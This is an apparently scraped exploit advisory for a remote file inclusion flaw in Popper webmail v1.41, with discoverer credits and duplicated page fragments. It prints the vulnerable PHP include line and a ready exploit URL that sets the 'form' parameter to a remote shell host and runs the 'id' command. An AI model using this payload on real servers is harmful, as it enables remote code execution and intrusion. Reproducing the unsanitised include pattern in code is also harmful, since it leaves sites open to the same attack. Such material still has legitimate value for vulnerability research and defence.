Popper <= v1.41 (form) Remote File Inclusion Exploit

2006-09-1200:00:00

vulners.com

#==============================================================================================
#Popper <= v1.41 (form) Remote File Inclusion Exploit
#===============================================================================================

#Critical Level : Dangerous

#Venedor site : http://popper.ractive.ch/

#Version : v1.41

#================================================================================================
#Bug in : childwindow.inc.php

#Vlu Code :
#--------------------------------

<?php include($form.".form.inc.php");?>

#================================================================================================

#Exploit :
#--------------------------------

#http://sitename.com/[Script Path]/childwindow.inc.php?form=http://SHELLURL.COM?&cmd=id

#================================================================================================
#Discoverd By : SHiKaA

#Conatact : SHiKaA-[at]hotmail.com

#GreetZ : CCtream - Cyper-worrier team

Special Thx To : Str0ke & simoo

==================================================================================================

JSON

Popper &lt;= v1.41 &#40;form&#41; Remote File Inclusion Exploit

<?php include($form.".form.inc.php");?>

Special Thx To : Str0ke & simoo

Popper <= v1.41 (form) Remote File Inclusion Exploit